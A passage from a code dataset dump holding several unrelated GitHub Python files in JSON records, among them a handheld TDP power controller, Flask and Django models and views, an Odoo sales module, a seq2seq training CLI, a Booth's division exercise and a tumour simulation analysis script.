f.write(str(r))\n","repo_name":"UCU-urban-intelligence/scrapper","sub_path":"scripts/air_condition.py","file_name":"air_condition.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40689758961","text":"import os\nfrom subprocess import run\nfrom chimera_app.config import BIN_PATH\n\n\nPOWER_TOOL_PATH = os.path.join(BIN_PATH, 'power-tool')\n\n\nDEVICE_DB = {\n 'AYANEO::AYANEO 2' : {\n 'tdp_min' : 15,\n 'tdp_max' : 28,\n }\n}\n\n\ndef get_device_info():\n product_name = open('/sys/devices/virtual/dmi/id/product_name', 'r').read().strip()\n vendor_name = open('/sys/devices/virtual/dmi/id/sys_vendor', 'r').read().strip()\n\n key = vendor_name + '::' + product_name\n\n if not key in DEVICE_DB:\n return None\n\n return DEVICE_DB[key]\n\n\ndef get_tdp():\n device = get_device_info()\n if not device:\n return\n\n results = run([ 'sudo', '--non-interactive', POWER_TOOL_PATH, 'get-tdp' ], capture_output=True, text=True)\n lines = results.stdout.splitlines()\n\n tdp = None\n if len(lines) > 0:\n tdp = results.stdout.splitlines()[0]\n\n if not tdp:\n return\n\n return int(tdp)\n\n\ndef set_tdp(new_tdp):\n if type(new_tdp) != int:\n return\n\n device = get_device_info()\n if not device:\n return\n\n if new_tdp < device['tdp_min'] or new_tdp > device['tdp_max']:\n return\n\n run([ 'sudo', '--non-interactive', POWER_TOOL_PATH, 'set-tdp', str(new_tdp) ])\n","repo_name":"ukos-git/chimera","sub_path":"chimera_app/power.py","file_name":"power.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"18115319489","text":"from exts import db\r\n\r\n\r\nclass Goods(db.Model):\r\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\r\n gname = db.Column(db.String(100), nullable=False) # 商品名\r\n price = db.Column(db.Float, nullable=False) # 价格\r\n users = db.relationship('User', backref='goodslist', secondary='user_goods') \r\n # 因为goods表和user表没有直接外键,所以用参数secondary='user_goods'意思就是,如果要通过goods表找user 可以通过user_goods找,因为 user_goods表和user表有外键关系,(意思就是去第三方的表里去找)\r\n # 模型名 User secondary='user_goods'=号后是表名\r\n # backref ==> back reference 反向查找\r\n\r\n def __str__(self):\r\n return self.gname\r\n\r\n\r\n# tags = db.Table('User_goods', # 表名\r\n# db.Column('user_id', db.Integer, db.ForeignKey('user.id')), # user_id ,主键参考 user.id\r\n# db.Column('goods_id', db.Integer, db.ForeignKey('goods.id')) # goods_id ,主键参考 goods.id\r\n# db.Column('number', default=1) # 字段\r\n\r\n\r\n# 关系表 承接的是 user和goods之间的关系\r\nclass User_goods(db.Model):\r\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\r\n # user表的id 表名也就是 class User(db.Model) 函数名,生成数据表后就是小写的了\r\n user_id = db.Column(db.Integer, db.ForeignKey('user.id')) \r\n # goods表的id 表名也就是 class Goods(db.Model) 函数名,生成数据表后就是小写的了\r\n goods_id = db.Column(db.Integer, db.ForeignKey('goods.id')) \r\n number = db.Column(db.Integer, default=1)\r\n","repo_name":"aixiu/qianfeng-python-flask","sub_path":"flaskblog/apps/goods/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73186767845","text":"#-*- coding:utf-8 _*- \n\"\"\" \n@author:charlesXu\n@file: tflearn_seq2seq.py \n@desc: https://github.com/ichuang/tflearn_seq2seq/blob/master/tflearn_seq2seq.py\n@time: 2017/10/23 \n\"\"\"\n\nfrom __future__ import division, print_function\n\nimport os\nimport sys\nimport tflearn\nimport argparse\nimport json\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom pattern import SequencePattern\n\n\nclass TFLearnSeq2Seq(object):\n '''\n seq2seq recurrent nerual network.\n '''\n AVAILABLE_MODELS = [\"embedding_rnn\", \"embedding_attention\"]\n\n def __init__(self, sequence_pattern, seq2seq_model=None, verbose=None, name=None, data_dir=None):\n self.sequence_pattern = sequence_pattern\n self.seq2seq_model = seq2seq_model or \"embedding_rnn\"\n assert self.seq2seq_model in self.AVAILABLE_MODELS\n self.in_seq_len = self.sequence_pattern.INPUT_SEQUENCE_LENGTH\n self.out_seq_len = self.sequence_pattern.OUTPUT_SEQUENCE_LENGTH\n self.in_max_int = self.sequence_pattern.INPUT_MAX_INT\n self.out_max_int = self.sequence_pattern.OUTPUT_MAX_INT\n self.verbose = verbose or 0\n self.n_input_symbols = self.in_max_int + 1\n self.n_output_symbols = self.out_max_int + 2 # extra one for GO symbol\n self.model_instance = None\n self.name = name\n self.data_dir = data_dir\n\n def generate_training_data(self, num_points):\n x_data = np.random.randint(0, self.in_max_int, size=(num_points, self.in_seq_len))\n x_data = x_data.astype(np.uint32) # ensure integer type\n\n y_data = [ self.sequence_pattern.generate_output_sequence(x) for x in x_data]\n y_data = np.array(y_data)\n\n xy_data = np.append(x_data, y_data, axis=1)\n return xy_data, y_data\n\n def sequence_loss(self, y_pred, y_true):\n '''\n Loss function for the seq2seq RNN. Reshape predicted and true (label) tensors, generate dummy weights,\n then use seq2seq.sequence_loss to actually compute the loss function.\n :param y_pred:\n :param y_true:\n :return:\n '''\n if self.verbose > 2 : print(\"my_sequence_loss y_pred=%s, y_true=%s\" % (y_pred, y_true))\n logits = tf.unstack(y_pred, axis=1)\n targets = tf.unstack(y_true, axis=1)\n\n def CommandLine(args=None, arglist=None):\n '''\n Main command line. Accepts args, to allow for simple unit testing.\n '''\n help_text = \"\"\"\n Commands:\n train - give size of training set to use, as argument\n predict - give input sequence as argument (or specify inputs via --from-file )\n \"\"\"\n\n parser = argparse.ArgumentParser(description=help_text, formatter_class=argparse.RawTextHelpFormatter)\n\n parser.add_argument(\"cmd\", help=\"command\")\n parser.add_argument(\"cmd_input\", nargs='*', help=\"input to command\")\n parser.add_argument('-v', \"--verbose\", nargs=0,\n help=\"increase output verbosity (add more -v to increase versbosity)\", action=VAction, dest='verbose')\n parser.add_argument(\"-m\", \"--model\",\n help=\"seq2seq model name: either embedding_rnn (default) or embedding_attention\", default=None)\n parser.add_argument(\"-r\", \"--learning-rate\", type=float, help=\"learning rate (default 0.0001)\", default=0.0001)\n parser.add_argument(\"-e\", \"--epochs\", type=int, help=\"number of trainig epochs\", default=10)\n parser.add_argument(\"-i\", \"--input-weights\", type=str, help=\"tflearn file with network weights to load\",\n default=None)\n parser.add_argument(\"-o\", \"--output-weights\", type=str,\n help=\"new tflearn file where network weights are to be saved\", default=None)\n parser.add_argument(\"-p\", \"--pattern-name\", type=str, help=\"name of pattern to use for sequence\", default=None)\n parser.add_argument(\"-n\", \"--name\", type=str, help=\"name of model, used when generating default weights filenames\",\n default=None)\n parser.add_argument(\"--in-len\", type=int, help=\"input sequence length (default 10)\", default=None)\n parser.add_argument(\"--out-len\", type=int, help=\"output sequence length (default 10)\", default=None)\n parser.add_argument(\"--from-file\", type=str, help=\"name of file to take input data sequences from (json format)\",\n default=None)\n parser.add_argument(\"--iter-num\", type=int,\n help=\"training iteration number; specify instead of input- or output-weights to use generated filenames\",\n default=None)\n parser.add_argument(\"--data-dir\",\n help=\"directory to use for storing checkpoints (also used when generating default weights filenames)\",\n default=None)\n # model parameters\n parser.add_argument(\"-L\", \"--num-layers\", type=int, help=\"number of RNN layers to use in the model (default 1)\",\n default=1)\n parser.add_argument(\"--cell-size\", type=int, help=\"size of RNN cell to use (default 32)\", default=32)\n parser.add_argument(\"--cell-type\", type=str, help=\"type of RNN cell to use (default BasicLSTMCell)\",\n default=\"BasicLSTMCell\")\n parser.add_argument(\"--embedding-size\", type=int, help=\"size of embedding to use (default 20)\", default=20)\n parser.add_argument(\"--tensorboard-verbose\", type=int, help=\"tensorboard verbosity level (default 0)\", default=0)\n\n if not args:\n args = parser.parse_args(arglist)\n\n if args.iter_num is not None:\n args.input_weights = args.iter_num\n args.output_weights = args.iter_num + 1\n\n model_params = dict(num_layers = args.num_layers,\n cell_size = args.cell_size,\n cell_type = args.cell_type,\n embedding_size = args.embedding_size,\n learning_rate = args.learning_rate,\n tensorboard_verbose = args.tensorboard_verbose)\n\n if args.cmd == \"train\":\n try:\n num_points = int(args.cmd_input[0])\n except:\n raise Exception(\"Please specify the number of datapoints to use for training, as the first argument\")\n sp = SequencePattern(args.pattern_name, in_seq_len=args.in_len, out_seq_len=args.out_len)\n ts2s = TFLearnSeq2Seq(sp, seq2seq_model=args.model, data_dir=args.data_dir, name=args.name, verbose=args.verbose)\n ts2s.train(num_epochs=args.epochs, num_points=num_points, weights_output_fn=args.output_weights,\n weights_input_fn=args.input_weights, model_params=model_params)\n return ts2s\n\n elif args.cmd == \"predict\":\n if args.from_file:\n inputs = json.loads(args.from_file)\n try:\n input_x = map(int, args.cmd_input)\n inputs = [input_x]\n except:\n raise Exception(\"Please provide a space-delimited input sequence as the argument\")\n\n sp = SequencePattern(args.pattern_name, in_seq_len=args.in_len, out_seq_len=args.out_len)\n ts2s = TFLearnSeq2Seq(sp, seq2seq_model=args.model, data_dir=args.data_dir, name=args.name,\n verbose=args.verbose)\n results = []\n for x in inputs:\n prediction, y = ts2s.predict(x, weights_input_fn=args.input_weights, model_params=model_params)\n print(\"==> For input %s, prediction=%s (expected=%s)\" % (x, prediction, sp.generate_output_sequence(x)))\n results.append([prediction, y])\n ts2s.prediction_results = results\n return ts2s\n\n else:\n print(\"Unknown command %s\" % args.cmd)\n\n if __name__ == \"__main__\":\n CommandLine()","repo_name":"cash2one/MachineLearning-2","sub_path":"DeepLearning/tflearn/tflearn_seq2seq.py","file_name":"tflearn_seq2seq.py","file_ext":"py","file_size_in_byte":7962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37453062279","text":"calculation_to_units = 24\nname_of_unit = \"hours\"\n\ndef days_to_units(num_of_days):\n #condition_check = num_of_days > 0\n #print(type(condition_check))\n\n if num_of_days > 0:\n return(f\"{num_of_days} days are {num_of_days * calculation_to_units} {name_of_unit}\")\n elif num_of_days == 0:\n return \"you entered a number that is 0 days, no conversion value\"\n else:\n return \"you entered a negative value, no conversion value\"\n\nuser_input = input(\"Hey user, enter a number of days and i will convert it to hours!\\n\")\nif user_input.isdigit():\n user_input_number = int(user_input)\n calculated_value = days_to_units(int(user_input))\n print(calculated_value)\nelse:\n print(\"your input is not a number. Don't ruin my program\")\n\n\n\n\n","repo_name":"roberton4real/nj-pythonProject","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72248982565","text":"#!/usr/bin/python\nimport sys\nImport ('env')\n\n\nsource_files = ['bmfont.cpp',\n 'GPC_Canvas.cpp',\n 'GPC_Engine.cpp',\n 'GPC_KeyboardDevice.cpp',\n 'GPC_MouseDevice.cpp',\n 'GPC_RawImage.cpp',\n 'GPC_RawLoadDotBlendArray.cpp',\n 'GPC_RawLogoArrays.cpp',\n 'GPC_RenderTools.cpp',\n 'GPC_System.cpp']\n\nincs = ['.',\n '#intern/string',\n '#intern/ghost',\n '#intern/guardedalloc',\n '#intern/moto/include',\n '#intern/container',\n '#source/gameengine/Rasterizer/RAS_OpenGLRasterizer',\n '#source/gameengine/Converter',\n '#source/gameengine/BlenderRoutines',\n '#source/blender/imbuf',\n '#source/gameengine/Ketsji',\n '#source/blender/blenlib',\n '#source/blender/blenfont',\n '#source/blender/blenkernel',\n '#source/blender',\n '#source/blender/include',\n '#source/blender/makesdna',\n '#source/gameengine/BlenderRoutines',\n '#source/gameengine/Rasterizer',\n '#source/gameengine/GameLogic',\n '#source/gameengine/Expressions',\n '#source/gameengine/Network',\n '#source/gameengine/SceneGraph',\n '#source/gameengine/Physics/common',\n '#source/gameengine/Network/LoopBackNetwork',\n '#source/gameengine/GamePlayer/ghost',\n '#source/blender/misc',\n '#source/blender/blenloader',\n '#source/blender/gpu',\n '#extern/glew/include']\n\ndefs = [ 'GLEW_STATIC' ]\n\nif env['WITH_BF_PYTHON']:\n incs += Split(env['BF_PYTHON_INC'])\n defs.append('WITH_PYTHON')\n\nincs += Split(env['BF_PNG_INC'])\nincs += Split(env['BF_ZLIB_INC'])\n\nenv.BlenderLib (libname='ge_player_common', sources=source_files, includes=incs, defines = defs, libtype=['player'], priority=[5], cxx_compileflags=env['BGE_CXXFLAGS'])\n","repo_name":"damiles/blendocv","sub_path":"source/gameengine/GamePlayer/common/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"52"} +{"seq_id":"9575099240","text":"from django.conf.urls import url\nfrom . import views\n \nurlpatterns = [\n url(r'^$', views.index),\n url(r'^logout$', views.logout),\n url(r'^create_message$', views.create_message),\n url(r'^create_comment$', views.create_comment),\n url(r'^delete_comment$', views.delete_comment),\n url(r'^delete_message$', views.delete_message)\n]\n","repo_name":"LeahTalk/the_wall","sub_path":"apps/messages_and_comments/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4902644561","text":"import sys\n\n\ndef main():\n \"\"\"\n Executes the building function an catches and prints AssertationErrors\n \"\"\"\n try:\n building()\n except AssertionError as e:\n print(\"AssertionError:\", e)\n\n\ndef building():\n \"\"\"\n Takes a string from the commandline arguments and counts \\\n different aspects of the string like\n - uppercase characters\n - lowercase characters\n - punctuation characters\n - space characters\n - digit characters\n and prints them.\n\n If more than 1 argument is provided a \"AssertionError: more \\\n than one argument is provided\" is thrown.\n If no argument is provided the user is prompted to give on \\\n via the command line.\n \"\"\"\n argv = sys.argv\n argc = len(argv)\n\n if argc > 2:\n assert False, \"more than one argument is provided\"\n\n sentence = \"\"\n if argc == 1:\n sentence = input(\"What is the text to count?\\n\")\n else:\n sentence = argv[1]\n\n punctuation_posibilities = \".,;:!?\\\"-\"\n\n upper = 0\n lower = 0\n punctuation = 0\n spaces = 0\n digits = 0\n\n for letter in sentence:\n if letter.isupper():\n upper += 1\n elif letter.islower():\n lower += 1\n elif letter in punctuation_posibilities:\n punctuation += 1\n elif letter.isspace():\n spaces += 1\n elif letter.isdigit():\n digits += 1\n\n print(\"The text contains\", len(sentence), \"characters\")\n print(upper, \"upper letters\")\n print(lower, \"lower letters\")\n print(punctuation, \"punctuation marks\")\n print(spaces, \"spaces\")\n print(digits, \"digits\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"FelixBrgm/42_python_piscine","sub_path":"source/0/ex05/building.py","file_name":"building.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42200565180","text":"from helper import *\n\ndef boothes(dividend,divisor):\n\tif divisor==0:\n\t\tprint(\"Divisor cannot be zero\")\n\t\treturn\n\taplusq=convert_twos_complement(dividend,22)\n\tm=convert_twos_complement(divisor,11)\n\tflag1=0\n\tflag2=0\n\tif aplusq[0]==\"1\":\n\t\taplusq=twos_complement(aplusq,22)\n\t\tflag1=1\n\tif m[0]==\"1\":\n\t\tm=twos_complement(m,11)\n\t\tflag2=1\t\t\t\t\n\ta=aplusq[:11]\n\tq=aplusq[11:]\n\tcount=11\n\tprint(\"Step:\",0,\"A:\",a,\"Q:\",q,\"M:\",m)\n\tfor i in range(count):\n\t\taplusq=a+q\n\t\taplusq=aplusq[1:]+\"0\"\n\t\ta=aplusq[:11]\n\t\tq=aplusq[11:]\n\t\tprevious=a\n\t\tif m[0]==aplusq[0]:\n\t\t\ta=add(aplusq[:11],twos_complement(m,11))\n\t\telse:\n\t\t\ta=add(aplusq[:11],m)\t\n\t\tif a[0]==previous[0] or (a==(\"0\"*11) and q==\"0\"*11):\n\t\t\tq=q[:-1]+\"1\"\n\t\telse:\n\t\t\ta=previous\n\t\tprint(\"Step:\",i+1,\"A:\",a,\"Q:\",q,\"M:\",m)\n\n\tif flag1==1 and flag2==0:\n\t\tq=twos_complement(q,11)\n\t\ta=twos_complement(a,11)\n\tif flag1==0 and flag2==1:\n\t\tq=twos_complement(q,11)\n\tif flag1==1 and flag2==1:\n\t\ta=twos_complement(a,11)\n\tprint(\"Quotient:\",q,\"Remainder:\",a)\n\ta=twos_complement_to_decimal(a)\n\tq=twos_complement_to_decimal(q)\t\n\tprint(\"Quotient:\",q,\"Remainder:\",a)\n\nc=[456,-10,-20,-1000,1000]\nd=[0,-3,3,-1,1000]\n\nfor i in range(5):\n\tprint(\"Sample Test\",i+1,\":\",c[i],\"divided by\",d[i])\n\tboothes(c[i],d[i])\n\tprint(\"----x----x-----x-----x----\")\t\n\nprint(\"Enter Dividend : \")\ndividend=int(input())\nprint(\"Enter Divisor : \")\ndivisor=int(input())\nboothes(dividend,divisor)\n","repo_name":"vishwesh-D-kumar/CSE-112-Boothes-Multiplication-and-Division","sub_path":"division.py","file_name":"division.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17456428198","text":"from django.shortcuts import render\n\nfrom data01.models import pd1_time\nfrom data01.models import pd2\nfrom datetime import datetime, timedelta\n\n# Create your views here.\n\ndef test(request):\n return render(request,'data01/test.html',{})\n\ndef test_pd1_time(request):\n time=pd1_time.objects.exclude(title__exact='')\n return render(request,'data01/test_pd1_time.html',{'time':time})\n\ndef test_pd2(request):\n time=pd1_time.objects.exclude(title__exact='')\n return render(request,'data01/test_pd2.html',{'two':two})\n\n#아래에 있는 함수는 PosterData의 when을 datafield로 변경된 후에 실행가능함.\ndef index_tutorial(request):\n #today, tomorrow, this_week에는 오늘, 내일, 이번주의 주 번호가 들어감\n #주 번호는 52주 중 몇번째 주인지 나타내는 번호임\n #이 세개 변수는 python의 datetime 모듈을 사용했음.\n today=datetime.today()\n tomorrow=today+timedelta(days=1)\n this_week=today.isocalendar()[1] #week number\n date_KOR=[\"월\", \"화\", \"수\", \"목\", \"금\", \"토\", \"일\"]\n date=date_KOR[today.weekday()]\n #today_list, tomorrow_list, this_week_list에는 각각 오늘 내일 이번주 강연 데이터가 들어있음\n #각각 조건에 맞는 filter를 이용하였음.\n today_list=pd1_time.objects.filter(date__year=today.year, date__month=today.month, date__day=today.day)\n tomorrow_list=pd1_time.objects.filter(date__year=tomorrow.year, date__month=tomorrow.month, date__day=tomorrow.day)\n this_week_list=pd1_time.objects.filter(date__week=this_week)\n #return render(request,'data01/index.html',today_list)\n contents={'date':date, 'today_list':today_list,'tomorrow_list':tomorrow_list,'this_week_list':this_week_list}\n return render(request,'data01/index_tutorial.html',contents)\n'''\ndef about(request):\n return render(request,'about site')\n'''\n\ndef index(request):\n today=datetime.today()\n tomorrow=today+timedelta(days=1)\n this_week=today.isocalendar()[1]\n date_KOR=[\"월\",\"화\",\"수\",\"목\",\"금\",\"토\",\"일\"]\n date=date_KOR[today.weekday()]\n #start date와 end date 사이 값에 today, tomorrow, this_week중 하나라도 포함되면 list에 포함시켜야함\n #테스트용으로 startdate만으로 비교해볼것.\n today_list=pd2.objects.filter(startdate__year=today.year, startdate__month=today.month, startdate__day=today.day)\n tomorrow_list=pd2.objects.filter(startdate__year=tomorrow.year, startdate__month=tomorrow.month, startdate__day=tomorrow.day)\n\n this_week_list=pd2.objects.filter(startdate__week=this_week)\n contents={'date':date, 'today_list':today_list,'tomorrow_list':tomorrow_list,'this_week_list':this_week_list}\n return render(request,'data01/index.html',contents)\n'''\ndef category(request, kind):\n return render(request,'카테고리에 따른 포스터')\n'''\n","repo_name":"jyhong1/poslun","sub_path":"webserver01/data01/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16166451969","text":"__author__ = 'Dworkin'\n\nstore_path = './DATA/store.csv'\ntest_path = './DATA/test.csv'\ntrain_path = './DATA/train.csv'\nsubmission_path = './DATA/sample_submission.csv'\n\nstore_descr_df_path = './Results/store_descr.csv'\next_sales_df_path = './Results/ext_sales.csv'\nrez_sparse_one_hot_path = './Results/rez_one_hot_sparse.pickle'\n","repo_name":"perevalovtimur/Kaggle_Rossman","sub_path":"Settings.py","file_name":"Settings.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31158841569","text":"# -*- coding: utf-8 -*-\n \nfrom odoo import api, fields, models\nfrom odoo import tools, _\nfrom odoo.exceptions import ValidationError\n\nclass SaleOrder(models.Model):\n _inherit = 'sale.order'\n\n @api.multi\n def _order_count(self):\n obj = self.env['sale.order']\n for order in self:\n order.variation_order_count = obj.search_count([('sales_order', '=', order.id)])\n\n is_variation_order = fields.Boolean(string=\"Is a Variation Order\", default=lambda *a: False, readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]})\n sales_order = fields.Many2one('sale.order', string=\"Sales Order\", readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]})\n billed = fields.Boolean(string=\"Billed\", store=True, readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]})\n variation_order_count = fields.Integer(compute=_order_count, string=\"Variation Orders\")\n \n @api.multi\n @api.onchange('partner_id')\n def compute_sales_order(self):\n if not self.partner_id:\n return {'domain': {'sales_order': []}}\n domain = {'sales_order': ['&',('partner_id', '=', self.partner_id.id), ('is_variation_order', '=', False), ('state','=','sale')]}\n result = {'domain': domain}\n return result\n\n @api.model\n def create(self, vals):\n if vals.get('name', _('New')) == _('New'):\n if 'is_variation_order' in vals and vals.get('is_variation_order'):\n vals['name'] = self.env['ir.sequence'].next_by_code('sale.order.vo') or _('New')\n elif 'company_id' in vals:\n vals['name'] = self.env['ir.sequence'].with_context(force_company=vals['company_id']).next_by_code(\n 'sale.order') or _('New')\n else:\n vals['name'] = self.env['ir.sequence'].next_by_code('sale.order') or _('New')\n\n # Makes sure partner_invoice_id', 'partner_shipping_id' and 'pricelist_id' are defined\n if any(f not in vals for f in ['partner_invoice_id', 'partner_shipping_id', 'pricelist_id']):\n partner = self.env['res.partner'].browse(vals.get('partner_id'))\n addr = partner.address_get(['delivery', 'invoice'])\n vals['partner_invoice_id'] = vals.setdefault('partner_invoice_id', addr['invoice'])\n vals['partner_shipping_id'] = vals.setdefault('partner_shipping_id', addr['delivery'])\n vals['pricelist_id'] = vals.setdefault('pricelist_id',\n partner.property_product_pricelist and partner.property_product_pricelist.id)\n result = super(SaleOrder, self).create(vals)\n return result\n","repo_name":"Muhammad-SF/Test","sub_path":"core/so_vo_progress_billing/models/so_vo_progress_billing.py","file_name":"so_vo_progress_billing.py","file_ext":"py","file_size_in_byte":2728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32023967002","text":"#!/usr/bin/env python3\n\n# code copied from \n# https://jupyter-notebook.readthedocs.io/en/stable/examples/Notebook/Importing%20Notebooks.html\n\nimport io\nfrom nbformat import read\nfrom pygments import highlight\nfrom pygments.lexers import PythonLexer\nfrom pygments.formatters import HtmlFormatter\n\nfrom IPython.display import display, HTML\n\nformatter = HtmlFormatter()\nlexer = PythonLexer()\n\n# publish the CSS for pygments highlighting\ndisplay(\n HTML(\"\"\"\n\n\"\"\" % formatter.get_style_defs()))\n\n\ndef show_notebook(fname):\n \"\"\"display a short summary of the cells of a notebook\"\"\"\n with io.open(fname, 'r', encoding='utf-8') as f:\n nb = read(f, 4)\n html = []\n for cell in nb.cells:\n html.append(\"

%s cell

\" % cell.cell_type)\n if cell.cell_type == 'code':\n html.append(highlight(cell.source, lexer, formatter))\n else:\n html.append(\"
%s
\" % cell.source)\n display(HTML('\\n'.join(html)))\n\n\n# show_notebook(os.path.join(\"nbpackage\", \"mynotebook.ipynb\"))\n# show_notebook('baseline.ipynb')","repo_name":"tddschn/jupyter-utils-tddschn","sub_path":"jupyter_utils_tddschn/notebook_shower.py","file_name":"notebook_shower.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"7597015806","text":"import matplotlib\nmatplotlib.use(\"Agg\")\nimport matplotlib.pyplot as plt\nplt.switch_backend(\"agg\")\nimport numpy as np\nimport os\nfrom panaxea.toolkit.Toolkit import depickle_from_lite\n\nfrom model.agents.CancerCell import CancerCell\n\n\ndef get_avg_num_agents(models):\n \"\"\"\n Given a set of model lite objects, returns a dictionary containing\n average number of agents at each epoch.\n\n Parameters\n ----------\n models : list\n The set of models lite (eg: As obtained through getModels)\n\n Returns\n -------\n dict\n A dictionary of average numbers of agents, with keys: cancerCells,\n tipCells, aliveCancerCells, deadCancerCells\n \"\"\"\n num_cancer = np.mean(\n [m.output[\"agentNums\"][\"cancerCells\"] for m in models], axis=0)\n tip_cells = np.mean([m.output[\"agentNums\"][\"tipCells\"] for m in models],\n axis=0)\n alive_cancer_cells = np.mean([m.output[\"agentNums\"][\"aliveCancerCells\"]\n for m in models], axis=0)\n dead_cancer_cells = np.mean([m.output[\"agentNums\"][\"deadCancerCells\"]\n for m in models], axis=0)\n\n return {\n \"cancerCells\": num_cancer,\n \"tipCells\": tip_cells,\n \"aliveCancerCells\": alive_cancer_cells,\n \"deadCancerCells\": dead_cancer_cells\n }\n\n\ndef get_avg_oxygen_concentrations(models):\n \"\"\"\n Given a set of model lites, returns a dictionary containing average,\n maximum and minimum oxygen concentrations at each\n epoch.\n Parameters\n ----------\n models : list\n The set of models lite (eg: As obtained through getModels)\n\n Returns\n -------\n dict\n A dictionary of average, maximum and minimum oxygen concentrations.\n\n \"\"\"\n avg_oxygen = np.mean(\n [m.output[\"cancerCellProperties\"][\"avgOxygen\"] for m in models],\n axis=0)\n min_oxygen = np.mean(\n [m.output[\"cancerCellProperties\"][\"minOxygen\"] for m in models],\n axis=0)\n max_oxygen = np.mean(\n [m.output[\"cancerCellProperties\"][\"maxOxygen\"] for m in models],\n axis=0)\n\n return {\n \"avg_oxygen\": avg_oxygen,\n \"min_oxygen\": min_oxygen,\n \"max_oxygen\": max_oxygen\n }\n\n\ndef get_avg_cancer_props(models):\n \"\"\"\n Given a set of model lites, returns a dictionary containing average\n cancer cell properties at each epoch.\n Parameters\n ----------\n models : list\n\n Returns\n -------\n dict\n The set of models lite (eg: As obtained through getModels)\n\n \"\"\"\n avg_hif = np.mean(\n [m.output[\"cancerCellProperties\"][\"avgHif\"] for m in models], axis=0)\n avg_vegf = np.mean(\n [m.output[\"cancerCellProperties\"][\"avgVegf\"] for m in models], axis=0)\n avg_metabolic_rate = np.mean(\n [m.output[\"cancerCellProperties\"][\"avgMetabolicRates\"] for m in\n models], axis=0)\n avg_p_synthesis = np.mean(\n [m.output[\"cancerCellProperties\"][\"avgPSynthesis\"] for m in models],\n axis=0)\n\n return {\n \"avgHif\": avg_hif,\n \"avgVegf\": avg_vegf,\n \"avgMetabolicRate\": avg_metabolic_rate,\n \"avgPSynthesis\": avg_p_synthesis\n }\n\n\ndef get_avg_vegf_stimulus(models):\n \"\"\"\n Given a set of model lites, returns a list of average vegf stimulus\n values at endothelial cells for each epoch.\n\n\n Parameters\n ----------\n models : list\n\n Returns\n -------\n list\n The aforementioned list\n \"\"\"\n\n return np.mean(\n [m.output[\"endothelialCellProperties\"][\"avgVegf\"] for m in models],\n axis=0)\n\n\ndef get_avg_tumour_volume(models):\n \"\"\"\n Given a set of model lites, returns a list of average tumour volumes for\n each epoch.\n\n Parameters\n ----------\n models : list\n The set of models lite (eg: As obtained through getModels)\n\n Returns\n -------\n list\n The aforementioned list\n \"\"\"\n\n return np.mean([m.output[\"maxDistances\"] for m in models], axis=0)\n\n\ndef get_avg_num_warburg_cells(models):\n \"\"\"\n Given a set of model lites, returns a list of PERCENTAGE fo warburg\n cells for each epoch.\n\n Parameters\n ----------\n models : list\n The set of models lite (eg: As obtained through getModels)\n\n Returns\n -------\n list\n The aforementioned list\n \"\"\"\n return np.mean(\n [m.output[\"cancerCellProperties\"][\"numWarburgCells\"] for m in models],\n axis=0)\n\n\ndef get_post_execution_analysis(target_dir, imgs_dir=\"imgs\"):\n \"\"\"\n Given a set of pickle lite objects, one for each end-state of models (eg\n as generated via the runModels function) this\n runs all post-execution analysis to generate relevant scatters and saves\n them to a specified directory. Average\n values across all execution are used to generate these EXCEPT FOR (see\n below):\n\n Parameters\n ----------\n target_dir : string\n The report dir, this is returned by the runModels function\n imgs_dir : string\n The directory where the images will be saved (it is created if it\n does not exist)\n \"\"\"\n\n imgs_path = \"%s/%s\" % (target_dir, imgs_dir)\n if not os.path.exists(imgs_path):\n os.mkdir(imgs_path)\n\n pickles = [f for f in os.listdir(target_dir) if f.endswith(\".pickle\")]\n\n if len(pickles) != 1:\n print(\"Expecting one pickle object, found {0}: {1}\".format(\n len(pickles), \",\".join(pickles)))\n\n model = depickle_from_lite(\"{0}/{1}\".format(target_dir, pickles[0]))\n\n c = CancerCell(model)\n get_hif_from_oxygen(c, out_path=imgs_path, interval=0.001)\n get_metabolic_rate_from_hif(c, out_path=imgs_path, interval=0.001)\n get_probability_synthesis_from_hif(c, out_path=imgs_path, interval=0.001)\n get_vegf_secretion_rate_from_hif_concentration(\n c,\n out_path=imgs_path,\n interval=0.001)\n c.warburg_switch = True\n get_hif_from_oxygen(\n c,\n out_path=imgs_path,\n interval=0.001,\n suffix=\"warburg\")\n\n models = [model]\n post_execution_agent_num_visualizer(\n render=False,\n num_agents=get_avg_num_agents(models),\n 